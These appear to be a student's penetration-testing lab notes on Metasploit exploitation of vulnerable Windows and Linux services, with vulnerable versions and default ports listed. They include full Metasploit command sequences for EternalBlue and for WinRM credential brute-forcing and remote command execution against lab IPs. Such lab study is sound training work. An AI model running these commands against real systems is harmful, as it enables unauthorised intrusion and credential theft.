Exploitation

Windows Exploitation

HFS (HTTP File Server)

A HFS (HTTP File Server) is a file and documents sharing web server.

• Rejetto HFS - free open source HTTP file server

🔬 HFS - MSF Exploit​

SMB - MS17-010 EternalBlue

• ​CVE-2017-0144​

• ​EternalBlue VA​

  • EternalBlue takes advantage of a Windows SMBv1 protocol vulnerability

  • Patch was released in March 2017

🔬 Check the Lab 2 - Eternal Blue here​

• Some MSF useful commands from my Home Lab (Kali VM + Win 2008_R2 Server)

service postgresql start && msfconsole -qdb_statussetg RHOSTS 192.168.31.131setg RHOST 192.168.31.131workspace -a EternalBlue​db_nmap -sS -sV -O 192.168.31.131search type:auxiliary EternalBlueuse auxiliary/scanner/smb/smb_ms17_010optionsrun​search type:exploit EternalBlueuse exploit/windows/smb/ms17_010_eternalblueoptionsrun

WinRM

• Identify WinRM users with MSF and exploit WinRM by obtaining access credentials.

• Default WinRM HTTP port is 5985 and HTTPS 5986

🔬 WinRM Attack lab​

service postgresql start && msfconsole -qdb_statussetg RHOSTS 10.2.27.173setg RHOST 10.2.27.173workspace -a WinRM​db_nmap -sS -sV -O -p- 10.2.27.173# Port 5985 is set up for WinRMsearch type:auxiliary winrmuse auxiliary/scanner/winrm/winrm_auth_methodsoptionsrun​# Brute force WinRM loginsearch winrm_loginuse auxiliary/scanner/winrm/winrm_loginset USER_FILE /usr/share/metasploit-framework/data/wordlists/common_users.txtset PASS_FILE /usr/share/metasploit-framework/data/wordlists/unix_passwords.txt​search winrm_cmduse auxiliary/scanner/winrm/winrm_cmdset USERNAME administratorset PASSWORD tinkerbellset CMD whoamirunsearch winrm_scriptuse exploit/windows/winrm/winrm_script_execset USERNAME administratorset PASSWORD tinkerbellset FORCE_VBS trueexploit

Apache Tomcat

​Apache Tomcat is a free open source Java servlet web server, build to host dynamic websites and web apps developed in Java.

• Tomcat default TCP port is 8080

• Apache web server host HTML/PHP web apps, instead

• Apache Tomcat < v.8.5.23 is vulnerable to a JSP Upload Bypass / RCE

🔬 Tomcat - MSF Exploit​

Linux Exploitation

FTP

​vsftpd is an Unix FTP server.

• vsftpd v.2.3.4 is vulnerable to a command execution vulnerability

🔬 FTP - MSF Exploit​

SAMBA

Samba is the Linux implementation of SMB.

• Samaba v.3.5.0 is vulnerable to a RCE vulnerability

🔬 Samba - MSF Exploit​

SSH

libssh is a C library that implements the SSHv2 protocol

• SSH default TCP port is 22

• libssh v.0.6.0 - 0.8.0 is vulnerable to an authentication bypass vulnerability

🔬 SSH - MSF Exploit​

SMTP

​Haraka is an open source high performance SMTP server developed in Node.js

• SMTP default TCP port is 25

  • other TCP ports are 465 and 587

• Haraka prior to v.2.8.9 is vulnerable to command injection

🔬 SMTP - MSF Exploit​